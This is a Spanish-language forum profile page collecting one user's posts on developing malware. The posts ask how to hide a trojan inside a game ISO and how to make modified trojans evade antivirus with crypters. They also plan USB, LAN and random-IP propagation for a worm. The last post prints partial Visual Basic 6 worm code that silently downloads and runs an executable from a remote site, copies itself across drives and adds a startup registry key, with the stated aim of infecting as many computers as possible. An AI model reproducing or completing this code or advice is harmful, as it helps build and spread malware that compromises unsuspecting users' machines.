Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - FoxSoul

#1
ahhhhhhhhhhhhh, muchas gracias! Ahora si lo entendi bien! xD muchas gracias! Claro primero se ejecuta el instalador e instala normal, y despues cuando instala el infectado no importa que no se instale correctamente,por que primero instalara lo que yo quiero y el usuario cerrar la segunda instalacion ( que aunque la aceptara saldria error,pero ya no importara por que ya habra instalado lo que él queria!)

GRACIAS =D
#2
Hola foreros, bueno estaba renegando con u metodo para infectar un ISO a tra vez del uso de powerISO para poder manipular su contenido pero si junto un troyano con el archivo setup.exe que esta en su interior no se instala el juego (aclaro que lo junto con iexpress), intente jugar un poco con el autorun.inf para decirle que primero ejecute el troyano y despues el setup.exe pero tampoco funciono, me preguntaba si hay algun metodo actual para infectar una ISO o cual es la mejor manera de hacer esto?  Saludos y gracias de antemano!
#3
Bueno estoy viendo como infectar un autorun, tengo mi powerISO, con esto abro las ISO de lo que quiero y veo su contenido, por lo general siempre hay un autorun.inf

Ahora queria segui este tutorial, y aunque no tengo problemas con el ingles, lo que pasa es que entiendo lo que dice pero no lo comprendo xD Si alguien me puede ayudar con los pasos del autorun se lo agradeceria mucho el tuto que estoy siguiendo es este y estoy trabado en el paso 1!!!

http://webcache.googleusercontent.com/search?q=cache:SRFiJSXxpxIJ:www.hackforums.net/showthread.php?tid%3D302285+&cd=3&hl=es-419&ct=clnk&gl=ar&client=firefox-a

Como es un post de hackforums lo puse desde el cache de google para que no aya problema para nadie....bueno tengo mi carptea en el escritorio con el autorun.inf de la ISO que quiero infectar.....ahora????

Gracias de antemano!y Buenos dias
#4
Hola! Bueno Yo no soy un experto y tampoco te explicas mucho, pero voy a suponer que tenes un troyano al cual atravez de algun metodo (XOR, RIT, Dsplit, AvFucker, etc) identificaste el offset con la firma detectada y lo modificaste y ya no te lo detecta pero ahora no te funciona...si esto es asi entonces lamento decrite, que tambien supongo, que ese offset que hizo indetectable tu troyano en realidad lo hizo obsoleto tambien ( puede que lo ayas roto y por eso no es detectado como amenza por el av, por que en realidad no hay tal amenaza ó tal vez es una firma que esta ddemaciado quemada, y es lo unico que podias cambiar para que no lo detecte pero no se puede hacer sin romper el programa...) Por ende mi consejo es que sigas experimentando, esta claro que el troyano no cumple sus funciones pero ahora tendrias que averiguar bien a que se debe, si no es algo muy quemado, como un modulo de propagacion USB, entonces segui buscando otros offsets que puedas modificar pero que te den el resultado que buscas, que obviamente es que sea indetectable y siga funcionando, te recomiendo que uses un crypter, si tenes tiempo que hagas el tuyo propio, hay muchos tutoriales que muestran como hacerlos paso a paso, mi humilde consejo final es, empeza simple y despues anda agregando la complejidad, asi va  hacer mas facil detectar los problemas! Exitos y suerte!
#5
Hola gracias por responder, aunque soy relativamente nuevo en esto yo no se si de verdad depende todo de exploits hoy en dia, a menos que estes en un proyecto del calibre de stuxnet  :-X

De echo es justamente eso lo que me llamo la atencion del Houdini! Que siendo un rat escrito en vbs con metodos de propagacion tan basicos llegara tan lejos, aunque gracias MadAntrax por aclararme que en vbs es mas dificil que los antivirus lo detectaran y fuddearlo! Yo pensaba que era todo lo contrario y que siempre era mejor un .exe bien modeado y conun manifiesto! Ahora mismo estoy haciendo las segundas pruebas con mi primer w0rm al que le di la funcion de propagarce como el houdini ( mas basica aun, tya que yo no se tomar todos esos archivos que estan en el USB y hacer los accesos directos, pero si pude hacer con exito que mi proyecto se copie en mi USB con un autorun y me infecte! Ahora mismo estoy haciendo las segundas pruebas, ya que por el entusiasmo de que funcionara se me olvido poner esta ultima funcion en un loop xD Asi que si justo no estaban los USB's metidos cuando hice la primer prueba dudo mucho que se aya copiado! Deseenme suerte xD Ya en la semana voy a ver como adapatar tu modulo MadAntrax para agregarle la propagacion por LAN! En mi ignorancia yo creo que con estos dos metodos ya tendria un gusano más que decente, ya que mi objetivo es equilibrar la propagacion con la propiedad de que pase desapercivido lo más posible...jeje Una vez agregue esa ya me meto de lleno en un script que haga lo mismo y sea polymorphico! Ya que decis que no es tan complicado hacerlo en este lenguage y sera menos detectado! Gracias MadAntrax!!!  ;D
#6
Cita de: ||MadAntrax|| en 16 Enero 2014, 12:33 PM
Los métodos que más me gustan son:


LAN Honeypot

LAN Spread

USB Spread

Con esas opciones ya tendrás un worm de alta propagación

Gracias ||MadAntrax|| voy a ver como implementar estos tres ahora mismo estoy en ello! Estoy viendo como usar el metodo USB como el del tan popular Houdini worm , que esconde todos los archivos y hace accesos directos infectados en su lugar! Por que el que uso de momento lo copia con un autorun pero no me termina de convencer...
Y para la parte de Lan estoy viendo un codigo que pusiste vos que enumera los equipos en red y trata de infectarlos, les copia el regedit.exe! Estoy viendo como ponerlo en un modulo para que haga lo mismo pero se copie asi mismo, la idea es ponerlo en un modulo y que se copie a si mismo ahi.....=P

Aprobecho la oportunidad para decirte que no sos solo una fuente de buenos modulos xD pero tambien toda una fuente de inspiracion para mi! Admiro tu trabajo y cada dos por tres que encuentro algo interesante viene de vos! Asi que gracias por responder y voy a tener en cuenta estos metodos más ahora que vienen tan bien recomendados!!! Espero con ansias que termines tu proyecto que seguro es una obra de arte! =D Saludos y exitos!
#7
Hola grandes hackers!  Hace algunos meses empeze a estudiar por mi cuenta en mi tiempo libre ( que para bien o para mal ultimamente..es bastante xD ) todo lo que es este mundo de programacion y al poco tiempo me llamo mucho la atencion mas en concreto el mundo del maleware! Y es que me parece de los mas interesante como funcionan los gusanos y troyanos, sobretodo los de esta ultima generacion, y todo empezo sino me equivoco hace unos 25 años con el gusano de Morris, el cual despues de leer y analizar no me parecio tan complejo por eso me anime a seguir investigando pero la verdad los de ultima generacion si que parecen bastante mas complejos.

Bueno hace unos meses entonces empeze a programar aplicaciones sencillas, como un crypter que despues de retocar me quedo funcional y bastante indetectable. Pero ahora entrando al mundo de los gusanos ya se me complico un poco, hace unas cuantas semanas empeze a programar mi primer worm y como ya habia echo el crypter en VB6 bueno decidi probar hacer mi worm con este mismo lenguage.

Hace poco lei en este mismo foro ( lleno de grandes aportes!) la autopsia de un gusano bastante poderoso, entre otros nombres conocido como houdini-worm que parece que esta infectando a lo loco y ser muy complejo, sin embargo aca en menos de 24 horas lo destriparon todo xD  y es aca donde entra mi duda...

Como se llega a ese nivel? Como hacen esas maravillas (aunque un poco destructivas o molestas como este houdini) que son tan capacez, que el creador libera y el software solo se busca la vida y llega tan lejos como para que ahora estemos hablando de el por ejemplo.

Me gustaria saber como incorporar ese tipo de funciones a mi worm basico que solo se copia en algunas carpetas y descarga mi server y poco mas, ya que los tiempos de morris o iloveyou quedaron atras y la propagacion por msn,mail,lan,p2p ya no es efectiva ( lo que me molesta es que esto si ya lo puedo hacer y no me parece tan dificil xD ) Pero ahora estoy en windows 7 y mi worm no puede evolucionar....no les pongo el codigo por que es como dije antes de lo mas basico que hay.

Mi pregunta entonces es : que funciones le puedo agregar a mi worm ( o que deberia leer y estudiar para saber la respuesta) para poder propagarme de forma eficiente, como el houdini por ejemplo ( se que esconde los archivos del usb de manera que windows  no te los muestra y en su lugar genera accesos directos para infectar, bueno esto lo tengo claro y ya lo estoy estudiando a full..) pero bueno necesitaria una manito para avanzar mas rapido, necesito propagarme de forma mas masiva ( no hablo de millones tampoco xD ) pero algo que me de el control de la situacion, que modulos puedo implementar o como hacer....el objetivo principal es estar orgulloso de mi creacion por supuesto! Tambien cuento con Backtrack 5 r 3 que fue como empezo todo esto para mi xD Ya se que Vb6 no es el mejor lenguage pero tambien estoy seguro que igual se pueden hacer cosas muy interesantes con el todavía (por que mucho de lo que veo esta echo con VBS y es muy efectivo!)

Bueno ya escribi mucho xD Cualquier ayuda o debate me ayudaria, si alguien esta como yo y quiere aprender tambien no estaria mal formar un grupo para cubrir mas terreno, las ganas de aprender no me faltan y le dedico mucho tiempo pero eso no va a ser para siempre asi que por eso me urge lo de propagarme xD

Mi principal problema es que soy el unico de mi entorno que se interesa en este tema y no tengo a nadie que me ayude o siquiera que quiera desarrollar nada de nada, entonces todo lo tengo que hacer solo, buscar , ver tutoriales, leer articulos y manuales....

Desde ya gracias y felicidades por los aportes y por hacer de este uno de los foros de malweare mas inrteresantes con los que me tope! De nuevo cualquier ayuda orientacion o consejo va a ser mas que bien recivido! Me disculpo si lastime sus ojos con alguna falta de ortografia, suelo escribir mas en ingles y por eso hace años configure la correccion en ese idioma xD

Sin mas me despido y espero tener algunas respuestas!!!! =D
#8
hola danny! yo soy nuevo asi que solo te queria preguntar para ver si entendi bien:

Esto seria un crypter de archivos vbs? Por que no compilarlo y hacerlo  exe y encryptarlo "normalmente"?  Para que quede claro mi duda es: decis que seria mejor/mas eficiente por que no esta tan visto/usado? seria un interesante concepto


pd: vi en otro tema tuyo que necesitas payloads, bueno seguramente ya lo conoces, pero por las dudas te comento en backtrack 5 tenes las libreria de payloads y exploit que usa metaesploit, y tambien pordes descargar mas  actualizando o mas selectivamente desde www.exploit-db.com.

Bueno si veo algo que te sirva por ahi te lo posteo aca! suerte y exitos!
#9
Hola foro! primero que nada me gustaria desearles feliz año! Ya empezo el 2014 y me agarro trabajando en un proyecto pero la verdad es que me necesisto unos consejos!  Tengo mi w0rm a la mitad pobresito xD  Bueno les explico el proyecto:

#Nombre: Proyecto W0rm 2013.

#Lenguaje: Visual Basic 6.

#SO: Windows 7 Español-Ingles.

#Funciones:

1-Auto-Copy en todas las unidades disponibles y en algunos de los directorios de windows.

2-Crear llave de Registro para garantizar que se inicie con la PC.

3-Descargar y ejecutar.

4-Propagarce por Usb, Lan y Generar IP.

5-Comprobar estado de w0rm y archivos extra.

#codigo


Private Sub Form_Load()

On Error Resume Next             'le digo que si hay algun error siga adelante.

URLDownloadToFileA 0, "https://myremotesite.com/Archivo.exe",
"C:\Archivo.exe", 0, 0    'esto es parte del codigo para descargar y ejecutar, le digo de donde conseguir el archivo y donde guardarlo.

'#####1-Auto-Copy#####

RutaFinal1 = "C:\testworm.exe" 'le digo donde copiarce
RutaFinal2 = "C:\Windows\testworm.exe"
RutaFinal3 = "D:\testworm.exe"
RutaFinal4 = "F:\testworm.exe"

ArchivoOrigen = App.Path & "\" & App.EXEName & ".exe"  'le digo donde estsa guardado para que pueda copiarce.

FileCopy ArchivoOrigen, RutaFinal1
FileCopy ArchivoOrigen, RutaFinal2
FileCopy ArchivoOrigen, RutaFinal3  'le digo que se copie.
FileCopy ArchivoOrigen, RutaFinal4
FileCopy ArchivoOrigen, RutaFinal5

Me.Visible = False                          'le digo que lo haga oculto

End Sub

' #####2-Crear llave de Registro#####

'en esta parte estoy trabajando ahora.....

Private Sub Resident()

Dim REG As Object
gusano = "C:\Windows\en\testworm.exe"
Set REG = CreateObject("WScript.Shell")
REG.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Test", gusano

'esto no me funciona y llevo un rato probando distintos codigos..pero nada en mi registro......que es lo que esta mal????????


End Sub


'######3-Descargar y ejecutar.######

'segunda parte del codigo de descarga y ejecucion, esta se encarga de ejecutar el Archivo.

Private Sub Timer8_Timer()      'pongo un Timer con intervalo de dos segundos
On Error Resume Next                                  en el form.
If Dir("C:\Archivo.exe") = "" Then
Timer8.Enabled = True
Else
Shell "C:\Archivo.exe", vbNormalFocus
Timer8.Enabled = False                         'Esta parte apaga el timer,para
End If                                                  el Archivo.exe no se siga ejecutando!




'#####4-Propagarce por Usb, Lan y Generar iP.#####
   
'trabajando en esto.....

'MadAntrax publico un modulo de clase para esto pero era para Xp....como puedo hacer que funcione en win7? tengo entendido que el modulo asi que el gusano creara IPs para infectar la mayor cantidad de equipos posible!!! Necesito algo asi!

#####5-Comprobar estado######

'trabajando en esto ...

'esto me las puedo arreglar tranquilo despues no me urge xD con unos timers o los comandos minute(now) u hour(now) se que le voy a dar forma...me urgen mas las dos funciones anteriores!


End Sub



Modulo para completar la funcion de Descarga y Ejecucion.


Declare Sub URLDownloadToFileA Lib "URLMON" (ByVal e As Long, ByVal w As String, ByVal f As String, ByVal g As Long, ByVal n As Long)
Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long





Bueno la verdad gracias al foro y a mucha busqueda por google,  avanze un poco pero lo que mas necesito ahora seria completar las funciones que tengo incompletas.  MadAntrax posteo un modulo para propagarce por LAN e IP pero era para XP , como puedo hacer esto para win7 ??? a propagarce por IP  me refiero a que cree dinamicamente IPs para infectar la mayor cantidad de equipos posible!

Bueno cualquier ayuda les estare infinitamente agradecido! Desde ya gracias por leer y espero que les sirva el Modulo y el poco codigo que aporto!